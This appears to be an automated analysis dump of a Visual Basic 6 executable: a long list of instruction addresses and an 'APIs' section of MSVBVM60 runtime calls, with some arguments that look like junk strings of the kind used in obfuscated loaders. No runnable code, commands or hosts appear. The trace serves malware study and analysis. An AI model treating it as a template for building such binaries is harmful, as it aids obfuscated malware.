0x0041cd3e
0x0041cd44
0x0041cd52
0x0041cd6f
0x0041cd54
0x0041cd54
0x0041cd59
0x0041cd5e
0x0041cd63
0x0041cd63
0x0041cd81
0x0041cd99
0x0041cd9c
0x0041cd9e
0x0041cdab
0x0041cdcd
0x0041cdad
0x0041cdad
0x0041cdaf
0x0041cdb4
0x0041cdba
0x0041cdc0
0x0041cdc5
0x0041cdc5
0x0041cdd7
0x0041cdf2
0x0041cdf8
0x0041cdfa
0x0041ce07
0x0041ce2c
0x0041ce09
0x0041ce09
0x0041ce0e
0x0041ce13
0x0041ce19
0x0041ce1f
0x0041ce24
0x0041ce24
0x0041ce3a
0x0041ce41
0x0041ce46
0x0041ce54
0x0041ce71
0x0041ce56
0x0041ce56
0x0041ce5b
0x0041ce60
0x0041ce65
0x0041ce65
0x0041ce95
0x0041ce99
0x0041ce9e
0x0041ceb6
0x0041cebc
0x0041cebe
0x0041cecb
0x0041cef0
0x0041cecd
0x0041cecd
0x0041ced2
0x0041ced7
0x0041cedd
0x0041cee3
0x0041cee8
0x0041cee8
0x0041cef7
0x0041cefc
0x0041ceff
0x0041cf09
0x0041cf11
0x0041cf19
0x0041cf19
0x0041cf1e
0x0041cf25
0x0041cf2f
0x0041cf39
0x0041cf3b
0x0041cf43
0x0041cf44
0x0041cf4f
0x0041cf50
0x0041cf55
0x0041cf5b
0x0041cf5c
0x0041cf61
0x0041cf66
0x0041cf72
0x0041cf76
0x0041cf77
0x0041cf82
0x0041cf83
0x0041cf89
0x0041cf8a
0x0041cf8c
0x0041cf91
0x0041cf94
0x0041cf9b
0x0041cfa0
0x0041cfa6
0x0041cfb5
0x0041cfbb
0x0041cfc2
0x0041cfc7
0x0041cfd1
0x0041cfd6
0x0041cfe4
0x0041d001
0x0041cfe6
0x0041cfe6
0x0041cfeb
0x0041cff0
0x0041cff5
0x0041cff5
0x0041d025
0x0041d029
0x0041d02e
0x0041d046
0x0041d049
0x0041d04b
0x0041d058
0x0041d07a
0x0041d05a
0x0041d05a
0x0041d05c
0x0041d061
0x0041d067
0x0041d06d
0x0041d072
0x0041d072
0x0041d081
0x0041d083
0x0041d085
0x0041d087
0x0041d08c
0x0041d08f
0x0041d094
0x0041d09e
0x0041d0a6
0x0041d0ae
0x0041d0b3
0x0041d0c1
0x0041d0de
0x0041d0c3
0x0041d0c3
0x0041d0c8
0x0041d0cd
0x0041d0d2
0x0041d0d2
0x0041d102
0x0041d106
0x0041d10b
0x0041d123
0x0041d129
0x0041d12b
0x0041d138
0x0041d15d
0x0041d13a
0x0041d13a
0x0041d13f
0x0041d144
0x0041d14a
0x0041d150
0x0041d155
0x0041d155
0x0041d164
0x0041d167
0x0041d16a
0x0041d16b
0x0041d170
0x0041d171
0x0041d176
0x0041d179
0x0041d17a
0x0041d17f
0x0041d180
0x0041d185
0x0041d18b
0x0041d1a1
0x0041d1ab
0x0041d1af
0x0041d1b3
0x0041d1b4
0x0041d1b6
0x0041d1bb
0x0041d1c1
0x0041d1cf
0x0041d1d5
0x0041d1e3
0x0041d200
0x0041d1e5
0x0041d1e5
0x0041d1ea
0x0041d1ef
0x0041d1f4
0x0041d1f4
0x0041d224
0x0041d228
0x0041d22d
0x0041d245
0x0041d248
0x0041d24a
0x0041d257
0x0041d279
0x0041d259
0x0041d259
0x0041d25b
0x0041d260
0x0041d266
0x0041d26c
0x0041d271
0x0041d271
0x0041d287
0x0041d2a4
0x0041d289
0x0041d289
0x0041d28e
0x0041d293
0x0041d298
0x0041d298
0x0041d2c8
0x0041d2cc
0x0041d2d1
0x0041d2e9
0x0041d2ef
0x0041d2f1
0x0041d2fe
0x0041d323
0x0041d300
0x0041d300
0x0041d305
0x0041d30a
0x0041d310
0x0041d316
0x0041d31b
0x0041d31b
0x0041d32a
0x0041d32d
0x0041d330
0x0041d33a
0x0041d342
0x0041d346
0x0041d347
0x0041d349
0x0041d354
0x0041d358
0x0041d359
0x0041d35b
0x0041d363
0x0041d36d
0x0041d36e
0x0041d371
0x0041d376
0x0041d37b
0x0041d37b
0x0041d37e
0x0041d38c
0x0041d3a9
0x0041d38e
0x0041d38e
0x0041d393
0x0041d398
0x0041d39d
0x0041d39d
0x0041d3cd
0x0041d3d1
0x0041d3d6
0x0041d3ee
0x0041d3f4
0x0041d3f6
0x0041d403
0x0041d428
0x0041d405
0x0041d405
0x0041d40a
0x0041d40f
0x0041d415
0x0041d41b
0x0041d420
0x0041d420
0x0041d436
0x0041d453
0x0041d438
0x0041d438
0x0041d43d
0x0041d442
0x0041d447
0x0041d447
0x0041d477
0x0041d47b
0x0041d480
0x0041d498
0x0041d49e
0x0041d4a0
0x0041d4ad
0x0041d4d2
0x0041d4af
0x0041d4af
0x0041d4b4
0x0041d4b9
0x0041d4bf
0x0041d4c5
0x0041d4ca
0x0041d4ca
0x0041d4d9
0x0041d4db
0x0041d4dd
0x0041d4e0
0x0041d4e6
0x0041d4e7
0x0041d4ef
0x0041d4f0
0x0041d4f5
0x0041d4f6
0x0041d4f9
0x0041d4fc
0x0041d4fd
0x0041d502
0x0041d503
0x0041d508
0x0041d50e
0x0041d524
0x0041d52e
0x0041d532
0x0041d533
0x0041d535
0x0041d540
0x0041d544
0x0041d548
0x0041d549
0x0041d54b
0x0041d550
0x0041d559
0x0041d567
0x0041d56d
0x0041d57b
0x0041d598
0x0041d57d
0x0041d57d
0x0041d582
0x0041d587
0x0041d58c
0x0041d58c
0x0041d5bc
0x0041d5c0
0x0041d5c5
0x0041d5dd
0x0041d5e0
0x0041d5e2
0x0041d5ef
0x0041d611
0x0041d5f1
0x0041d5f1
0x0041d5f3
0x0041d5f8
0x0041d5fe
0x0041d604
0x0041d609
0x0041d609
0x0041d61b
0x0041d621
0x0041d62b
0x0041d631
0x0041d63b
0x0041d63d
0x0041d648
0x0041d64f
0x0041d650
0x0041d65b
0x0041d662
0x0041d663
0x0041d66e
0x0041d672
0x0041d673
0x0041d67b
0x0041d686
0x0041d68d
0x0041d68e
0x0041d690
0x0041d695
0x0041d698
0x0041d69f
0x0041d6a1
0x0041d6a1
0x0041d567
0x0041d6a6
0x0041d6ad
0x0041d6b2
0x0041d6b7
0x0041d6c5
0x0041d6e2
0x0041d6c7
0x0041d6c7
0x0041d6cc
0x0041d6d1
0x0041d6d6
0x0041d6d6
0x0041d706
0x0041d70a
0x0041d70f
0x0041d72a
0x0041d730
0x0041d732
0x0041d73f
0x0041d764
0x0041d741
0x0041d741
0x0041d746
0x0041d74b
0x0041d751
0x0041d757
0x0041d75c
0x0041d75c
0x0041d772
0x0041d78f
0x0041d774
0x0041d774
0x0041d779
0x0041d77e
0x0041d783
0x0041d783
0x0041d7b3
0x0041d7b7
0x0041d7bc
0x0041d7d7
0x0041d7dd
0x0041d7df
0x0041d7ec
0x0041d811
0x0041d7ee
0x0041d7ee
0x0041d7f3
0x0041d7f8
0x0041d7fe
0x0041d804
0x0041d809
0x0041d809
0x0041d81f
0x0041d83c
0x0041d821
0x0041d821
0x0041d826
0x0041d82b
0x0041d830
0x0041d830
0x0041d860
0x0041d864
0x0041d869
0x0041d884
0x0041d88a
0x0041d88c
0x0041d899
0x0041d8be
0x0041d89b
0x0041d89b
0x0041d8a0
0x0041d8a5
0x0041d8ab
0x0041d8b1
0x0041d8b6
0x0041d8b6
0x0041d8cc
0x0041d8da
0x0041d8e1
0x0041d8f2
0x0041d8f9
0x0041d92d
0x0041d936
0x0041d93a
0x0041d93e
0x0041d93f
0x0041d941
0x0041d949
0x0041d957
0x0041d974
0x0041d959
0x0041d959
0x0041d95e
0x0041d963
0x0041d968
0x0041d968
0x0041d998
0x0041d99c
0x0041d9a1
0x0041d9bc
0x0041d9c2
0x0041d9c4
0x0041d9d1
0x0041d9f6
0x0041d9d3
0x0041d9d3
0x0041d9d8
0x0041d9dd
0x0041d9e3
0x0041d9e9
0x0041d9ee
0x0041d9ee
0x0041d9fd
0x0041da1c
0x0041da25
0x0041da2a
0x0041da39
0x0041da3e
0x0041da60
0x0041da66
0x0041da73
0x0041da95
0x0041da75
0x0041da75
0x0041da7a
0x0041da7f
0x0041da82
0x0041da88
0x0041da8d
0x0041da8d
0x0041da9f
0x0041daa4
0x0041dab2
0x0041dacf
0x0041dab4
0x0041dab4
0x0041dab9
0x0041dabe
0x0041dac3
0x0041dac3
0x0041daf3
0x0041daf7
0x0041dafc
0x0041db17
0x0041db1a
0x0041db1c
0x0041db29
0x0041db4b
0x0041db2b
0x0041db2b
0x0041db2d
0x0041db32
0x0041db38
0x0041db3e
0x0041db43
0x0041db43
0x0041db59
0x0041db76
0x0041db5b
0x0041db5b
0x0041db60
0x0041db65
0x0041db6a
0x0041db6a
0x0041db9a
0x0041db9e
0x0041dba3
0x0041dbbb
0x0041dbc1
0x0041dbc3
0x0041dbd0
0x0041dbf5
0x0041dbd2
0x0041dbd2
0x0041dbd7
0x0041dbdc
0x0041dbe2
0x0041dbe8
0x0041dbed
0x0041dbed
0x0041dc03
0x0041dc20
0x0041dc05
0x0041dc05
0x0041dc0a
0x0041dc0f
0x0041dc14
0x0041dc14
0x0041dc44
0x0041dc48
0x0041dc4d
0x0041dc68
0x0041dc6e
0x0041dc70
0x0041dc7d
0x0041dca2
0x0041dc7f
0x0041dc7f
0x0041dc84
0x0041dc89
0x0041dc8f
0x0041dc95
0x0041dc9a
0x0041dc9a
0x0041dcaf
0x0041dcd4
0x0041dce1
0x0041dce8
0x0041dcfb
0x0041dd03
0x0041dd19
0x0041dd1f
0x0041dd2c
0x0041dd4e
0x0041dd2e
0x0041dd2e
0x0041dd33
0x0041dd38
0x0041dd3b
0x0041dd41
0x0041dd46
0x0041dd46
0x0041dd5b
0x0041dd5e
0x0041dd6c
0x0041dd89
0x0041dd6e
0x0041dd6e
0x0041dd73
0x0041dd78
0x0041dd7d
0x0041dd7d
0x0041ddad
0x0041ddb1
0x0041ddb6
0x0041ddce
0x0041ddd1
0x0041ddd3
0x0041dde0
0x0041de02
0x0041dde2
0x0041dde2
0x0041dde4
0x0041dde9
0x0041ddef
0x0041ddf5
0x0041ddfa
0x0041ddfa
0x0041de10
0x0041de2d
0x0041de12
0x0041de12
0x0041de17
0x0041de1c
0x0041de21
0x0041de21
0x0041de51
0x0041de55
0x0041de5a
0x0041de75
0x0041de7b
0x0041de7d
0x0041de8a
0x0041deaf
0x0041de8c
0x0041de8c
0x0041de91
0x0041de96
0x0041de9c
0x0041dea2
0x0041dea7
0x0041dea7
0x0041debd
0x0041dec7
0x0041decd
0x0041deda
0x0041dedf
0x0041df11
0x0041df1a
0x0041df20
0x0041df2d
0x0041df35
0x0041df3d
0x0041df41
0x0041df42
0x0041df44
0x0041df4c
0x0041df5a
0x0041df77
0x0041df5c
0x0041df5c
0x0041df61
0x0041df66
0x0041df6b
0x0041df6b
0x0041df9b
0x0041df9f
0x0041dfa4
0x0041dfbc
0x0041dfc2
0x0041dfc4
0x0041dfd1
0x0041dff6
0x0041dfd3
0x0041dfd3
0x0041dfd8
0x0041dfdd
0x0041dfe3
0x0041dfe9
0x0041dfee
0x0041dfee
0x0041dffd
0x0041dfff
0x0041e001
0x0041e00a
0x0041e00b
0x0041e01a
0x0041e037
0x0041e01c
0x0041e01c
0x0041e021
0x0041e026
0x0041e02b
0x0041e02b
0x0041e05b
0x0041e05f
0x0041e064
0x0041e07c
0x0041e082
0x0041e084
0x0041e091
0x0041e0b6
0x0041e093
0x0041e093
0x0041e098
0x0041e09d
0x0041e0a3
0x0041e0a9
0x0041e0ae
0x0041e0ae
0x0041e0c4
0x0041e0e1
0x0041e0c6
0x0041e0c6
0x0041e0cb
0x0041e0d0
0x0041e0d5
0x0041e0d5
0x0041e105
0x0041e10c
0x0041e111
0x0041e12c
0x0041e132
0x0041e134
0x0041e141
0x0041e166
0x0041e143
0x0041e143
0x0041e148
0x0041e14d
0x0041e153
0x0041e159
0x0041e15e
0x0041e15e
0x0041e170
0x0041e176
0x0041e183
0x0041e18f
0x0041e199
0x0041e1bd
0x0041e1c6
0x0041e1cc
0x0041e1d9
0x0041e1e1
0x0041e1e5
0x0041e1e6
0x0041e1e8
0x0041e1f3
0x0041e1fa
0x0041e1fe
0x0041e202
0x0041e203
0x0041e205
0x0041e213
0x0041e218
0x0041e226
0x0041e243
0x0041e228
0x0041e228
0x0041e22d
0x0041e232
0x0041e237
0x0041e237
0x0041e267
0x0041e26b
0x0041e270
0x0041e28b
0x0041e291
0x0041e293
0x0041e2a0
0x0041e2c5
0x0041e2a2
0x0041e2a2
0x0041e2a7
0x0041e2ac
0x0041e2b2
0x0041e2b8
0x0041e2bd
0x0041e2bd
0x0041e2d3
0x0041e2f0
0x0041e2d5
0x0041e2d5
0x0041e2da
0x0041e2df
0x0041e2e4
0x0041e2e4
0x0041e314
0x0041e318
0x0041e31d
0x0041e338
0x0041e33e
0x0041e340
0x0041e34d
0x0041e372
0x0041e34f
0x0041e34f
0x0041e354
0x0041e359
0x0041e35f
0x0041e365
0x0041e36a
0x0041e36a
0x0041e380
0x0041e38d
0x0041e3b5
0x0041e3bb
0x0041e3c8
0x0041e3ea
0x0041e3ca
0x0041e3ca
0x0041e3cf
0x0041e3d4
0x0041e3d7
0x0041e3dd
0x0041e3e2
0x0041e3e2
0x0041e3f7
0x0041e3fd
0x0041e401
0x0041e402
0x0041e404
0x0041e40c
0x0041e41a
0x0041e437
0x0041e41c
0x0041e41c
0x0041e421
0x0041e426
0x0041e42b
0x0041e42b
0x0041e45b
0x0041e45f
0x0041e464
0x0041e47f
0x0041e485
0x0041e487
0x0041e494
0x0041e4b9
0x0041e496
0x0041e496
0x0041e49b
0x0041e4a0
0x0041e4a6
0x0041e4ac
0x0041e4b1
0x0041e4b1
0x0041e4c7
0x0041e4e4
0x0041e4c9
0x0041e4c9
0x0041e4ce
0x0041e4d3
0x0041e4d8
0x0041e4d8
0x0041e508
0x0041e50c
0x0041e511
0x0041e529
0x0041e52f
0x0041e531
0x0041e53e
0x0041e563
0x0041e540
0x0041e540
0x0041e545
0x0041e54a
0x0041e550
0x0041e556
0x0041e55b
0x0041e55b
0x0041e56a
0x0041e56c
0x0041e56e
0x0041e577
0x0041e578
0x0041e587
0x0041e5a4
0x0041e589
0x0041e589
0x0041e58e
0x0041e593
0x0041e598
0x0041e598
0x0041e5c8
0x0041e5cf
0x0041e5d4
0x0041e5ef
0x0041e5f5
0x0041e5f7
0x0041e604
0x0041e629
0x0041e606
0x0041e606
0x0041e60b
0x0041e610
0x0041e616
0x0041e61c
0x0041e621
0x0041e621
0x0041e637
0x0041e654
0x0041e639
0x0041e639
0x0041e63e
0x0041e643
0x0041e648
0x0041e648
0x0041e678
0x0041e67f
0x0041e684
0x0041e69f
0x0041e6a5
0x0041e6a7
0x0041e6b4
0x0041e6d9
0x0041e6b6
0x0041e6b6
0x0041e6bb
0x0041e6c0
0x0041e6c6
0x0041e6cc
0x0041e6d1
0x0041e6d1
0x0041e6e7
0x0041e6f4
0x0041e707
0x0041e70e
0x0041e728
0x0041e731
0x0041e738
0x0041e73f
0x0041e743
0x0041e747
0x0041e748
0x0041e74a
0x0041e758
0x0041e75d
0x0041e76b
0x0041e788
0x0041e76d
0x0041e76d
0x0041e772
0x0041e777
0x0041e77c
0x0041e77c
0x0041e7ac
0x0041e7b0
0x0041e7b5
0x0041e7cd
0x0041e7d3
0x0041e7d5
0x0041e7e2
0x0041e807
0x0041e7e4
0x0041e7e4
0x0041e7e9
0x0041e7ee
0x0041e7f4
0x0041e7fa
0x0041e7ff
0x0041e7ff
0x0041e81c
0x0041e82c
0x0041e831
0x0041e83a
0x0041e854
0x0041e85b
0x0041e865
0x0041e886
0x0041e893
0x0041e89a
0x0041e89e
0x0041e89f
0x0041e8a1
0x0041e8ac
0x0041e8b0
0x0041e8b1
0x0041e8b3
0x0041e8c1
0x0041e8c6
0x0041e8d4
0x0041e8f1
0x0041e8d6
0x0041e8d6
0x0041e8db
0x0041e8e0
0x0041e8e5
0x0041e8e5
0x0041e915
0x0041e919
0x0041e91e
0x0041e939
0x0041e93f
0x0041e941
0x0041e94e
0x0041e973
0x0041e950
0x0041e950
0x0041e955
0x0041e95a
0x0041e960
0x0041e966
0x0041e96b
0x0041e96b
0x0041e981
0x0041e990
0x0041e99d
0x0041e9c8
0x0041e9ce
0x0041e9db
0x0041e9fd
0x0041e9dd
0x0041e9dd
0x0041e9e2
0x0041e9e7
0x0041e9ea
0x0041e9f0
0x0041e9f5
0x0041e9f5
0x0041ea0e
0x0041ea19
0x0041ea1e
0x0041ea34
0x0041ea3a
0x0041ea47
0x0041ea69
0x0041ea49
0x0041ea49
0x0041ea4e
0x0041ea53
0x0041ea56
0x0041ea5c
0x0041ea61
0x0041ea61
0x0041ea76
0x0041ea7b
0x0041ea82
0x0041eaf1
0x0041eaf9
0x0041eb01
0x0041eb09
0x0041eb11
0x0041eb12
0x0041eb14
0x0041eb19
0x0041eb1c
0x0041eb1d
0x0041eb1f
0x0041eb27
0x0041eb2f
0x0041eb37
0x0041eb3c

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041CCA2
#692.MSVBVM60(?,Unecliptic9,Bovlamme1,?,?,?,?,00401356), ref: 0041CCF7
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041CD1E
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041CD30
__vbaNew2.MSVBVM60(00403C38,004223FC,00008008,?), ref: 0041CD5E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 0041CDC0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,00000108), ref: 0041CE1F
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,00000108), ref: 0041CE41
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041CE60
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CE99
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000158), ref: 0041CEE3
#618.MSVBVM60(?,00000087), ref: 0041CEFF
__vbaStrMove.MSVBVM60(?,00000087), ref: 0041CF09
__vbaFreeStr.MSVBVM60(?,00000087), ref: 0041CF11
__vbaFreeObj.MSVBVM60(?,00000087), ref: 0041CF19
#711.MSVBVM60(?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041CF50
__vbaAryVar.MSVBVM60(00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041CF61
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041CF77
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041CF8C
__vbaSetSystemError.MSVBVM60(?,?,00401356), ref: 0041CFA6
#517.MSVBVM60(phrontisterium), ref: 0041CFC7
__vbaStrMove.MSVBVM60(phrontisterium), ref: 0041CFD1
__vbaNew2.MSVBVM60(0040324C,00422010,phrontisterium), ref: 0041CFF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D029
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000048), ref: 0041D06D
#712.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D094
__vbaStrMove.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D09E
__vbaFreeStr.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D0A6
__vbaFreeObj.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D0AE
__vbaNew2.MSVBVM60(0040324C,00422010,STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D0CD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D106
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000A0), ref: 0041D150
__vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D16B
__vbaStrToAnsi.MSVBVM60(?,Tvivlsomst9,00000000,?,?), ref: 0041D17A
__vbaSetSystemError.MSVBVM60(00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D18B
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D1B6
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041D1C1
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,00401356), ref: 0041D1EF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D228
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000050), ref: 0041D26C
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041D293
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D2CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000170), ref: 0041D316
__vbaStrCat.MSVBVM60(?,?), ref: 0041D330
__vbaStrMove.MSVBVM60(?,?), ref: 0041D33A
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?), ref: 0041D349
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D35B
__vbaPrintObj.MSVBVM60(00403D18,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D376
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,00401356), ref: 0041D398
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D3D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000110), ref: 0041D41B
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041D442
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D47B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000100), ref: 0041D4C5
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041D4E7
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4F0
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4FD
__vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D50E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D535
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000000,00000000), ref: 0041D54B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 0041D559
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,00000000,00000000), ref: 0041D587
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D5C0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000048), ref: 0041D604
#717.MSVBVM60(?,00000008,00000080,00000000), ref: 0041D650
__vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000), ref: 0041D663
__vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D673
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D67B
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000), ref: 0041D690
__vbaOnError.MSVBVM60(000000FF), ref: 0041D6A1
__vbaSetSystemError.MSVBVM60(000000FF), ref: 0041D6B2
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041D6D1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D70A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001E8), ref: 0041D757
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041D77E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D7B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001F0), ref: 0041D804
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041D82B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D864
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000E0), ref: 0041D8B1
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041D941
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,00401356), ref: 0041D963
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D99C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000120), ref: 0041D9E9
__vbaFreeObj.MSVBVM60 ref: 0041DA25
__vbaStrCopy.MSVBVM60 ref: 0041DA39
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000006F8), ref: 0041DA88
__vbaFreeStr.MSVBVM60(00000000,?,004038E8,000006F8), ref: 0041DA9F
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041DABE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DAF7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C58,00000060), ref: 0041DB3E
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041DB65
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DB9E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000110), ref: 0041DBE8
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041DC0F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DC48
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000120), ref: 0041DC95
__vbaFreeStr.MSVBVM60 ref: 0041DCE8
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DCFB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,000006FC), ref: 0041DD41
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041DD78
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DDB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CC4,00000048), ref: 0041DDF5
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041DE1C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DE55
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000F8), ref: 0041DEA2
__vbaStrMove.MSVBVM60(00000000,?,00403C58,000000F8), ref: 0041DEDA
__vbaStrMove.MSVBVM60 ref: 0041DF2D
__vbaFreeStr.MSVBVM60 ref: 0041DF35
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041DF44
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041DF66
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF9F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000130), ref: 0041DFE9
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E00B
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E026
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E05F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001E0), ref: 0041E0A9
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E0D0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E10C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000140), ref: 0041E159
__vbaStrMove.MSVBVM60(00000000,?,00403CC4,00000140), ref: 0041E183
__vbaStrVarMove.MSVBVM60(?), ref: 0041E18F
__vbaStrMove.MSVBVM60(?), ref: 0041E199
__vbaStrMove.MSVBVM60 ref: 0041E1D9
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E1E8
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041E205
__vbaFreeVar.MSVBVM60 ref: 0041E213
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E232
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E26B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000120), ref: 0041E2B8
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E2DF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E318
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000140), ref: 0041E365
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038E8,00000700), ref: 0041E3DD
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E404
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E426
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E45F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000180), ref: 0041E4AC
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E4D3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E50C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000160), ref: 0041E556
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E578
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E593
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E5CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000108), ref: 0041E61C
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E643
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E67F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000D8), ref: 0041E6CC
__vbaI4Var.MSVBVM60(?,?,?), ref: 0041E70E
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041E74A
__vbaFreeVar.MSVBVM60 ref: 0041E758
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041E777
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E7B0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000130), ref: 0041E7FA
